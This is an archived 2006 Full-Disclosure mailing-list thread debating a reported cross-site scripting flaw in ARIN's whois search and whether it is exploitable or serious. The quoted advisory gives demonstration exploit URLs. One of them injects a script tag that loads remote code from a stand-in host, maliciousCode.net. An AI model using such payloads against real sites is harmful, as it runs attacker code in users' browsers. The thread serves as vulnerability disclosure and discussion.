lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list] 
Date: Fri Mar  3 21:29:02 2006
From: steven at lovebug.org (Steven)
Subject: Arin.net XSS

It works in IE just fine and probably some other browsers.

Firefox does a few things:

1) It takes the liberty of converting "<" to %3C
2) Leaves %3C as %3C and does not convert into "<"

This prevents the script from being interpreted (in)properly via the Address 
bar.

Steven

----- Original Message ----- 
From: "Simon Smith" <simon@...soft.com>
To: "Steven" <steven@...ebug.org>
Cc: "Terminal Entry" <Security@...dro.net>; "Full Disclosure" 
<full-disclosure@...ts.grok.org.uk>; "Bug Traq" <bugtraq@...urityfocus.com>
Sent: Friday, March 03, 2006 4:09 PM
Subject: Re: [Full-disclosure] Arin.net XSS


> Right,
>    Did this ever work? This fails for me man. How did you verify it?
>
> Steven wrote:
>> ok?
>>
>> So what exactly are you going to exploit here?  This site doesn't have 
>> any logins or even use cookies.  Are you going to trick a user into 
>> entering in a credit card number before they can search the whois 
>> database?
>>
>> I think that XSS in many instances is a serious issues.  Many of the XSS 
>> issues reported on FD are rarely of much consequence but could 
>> theoretically lead to a sessions hijack or tricking the user into a fake 
>> login screen.  However, in this instance I fail to see what the point 
>> could possible be?  If it is that you can simply run javascript then so 
>> what?  Close to 100% of any webhosting provider on the internet will let 
>> you upload your own javascript.  Might as well report that geocities.com 
>> is vulnerable to XSS because you could upload an html file with 
>> javascript on it.
>>
>> Anyway.. that's my take on this.  Feel free to correct me.. I don't mind.
>>
>> Steven
>>
>> ----- Original Message ----- 
>>   From: Terminal Entry
>>   To: Full Disclosure ; Bug Traq
>>   Sent: Thursday, March 02, 2006 11:17 PM
>>   Subject: [Full-disclosure] Arin.net XSS
>>
>>
>>   Title
>>   ARIN.NET input validation holes in "?queryinput=" allows remote users 
>> conduct cross-site scripting attacks
>>
>>   Notification
>>   Multiple attempts to contact Arin site administrators went unanswered
>>
>>   Exploit Included:  Yes
>>
>>   Description
>>   The "?queryinput=" script does not properly validate user-supplied 
>> input in several parameters to filter HTML code. A remote user can create 
>> a specially crafted URL that, when loaded by a target user, will cause 
>> arbitrary scripting code to be executed by the target user's browser.
>>
>>   Some demonstration exploit URLs are provided:
>> 
>> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>> 
>> http://ws.arin.net/whois/?queryinput=%3CSCRIPT+SRC%3Dhttp%3A%2F%2FmaliciousCode.net%2Fexploit.js%3E%3C%2FSCRIPT%3E
>> 
>> http://ws.arin.net/whois/?queryinput=%3CIMG+SRC%3D%22javascript%3Aalert%28%27XSS%27%29%3B%22%3E
>>
>>   Discovered by Terminal Entry security [.at.] peadro (.)net
>>
>>
>>
>>
>> ------------------------------------------------------------------------------
>>   This email and any files transmitted with it are confidential and 
>> intended solely for the use of the individual or entity to whom they are 
>> addressed. If you have received this email in error please notify the 
>> system manager. This message contains confidential information and is 
>> intended only for the individual named. If you are not the named 
>> addressee you should not disseminate, distribute or copy this e-mail. 
>> Please notify the sender immediately by e-mail if you have received this 
>> e-mail by mistake and delete this e-mail from your system. If you are not 
>> the intended recipient you are notified that disclosing, copying, 
>> distributing or taking any action in reliance on the contents of this 
>> information is strictly prohibited.
>>
>>
>>
>> ------------------------------------------------------------------------------
>>
>>
>>   _______________________________________________
>>   Full-Disclosure - We believe in it.
>>   Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>>   Hosted and sponsored by Secunia - http://secunia.com/
>>
>> ------------------------------------------------------------------------
>>
>> _______________________________________________
>> Full-Disclosure - We believe in it.
>> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
>> Hosted and sponsored by Secunia - http://secunia.com/
>
>
> -- 
>
>
> Regards,
> Adriel T. Desautels
> Harvard Security Group
> http://www.harvardsecuritygroup.com
>
>

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ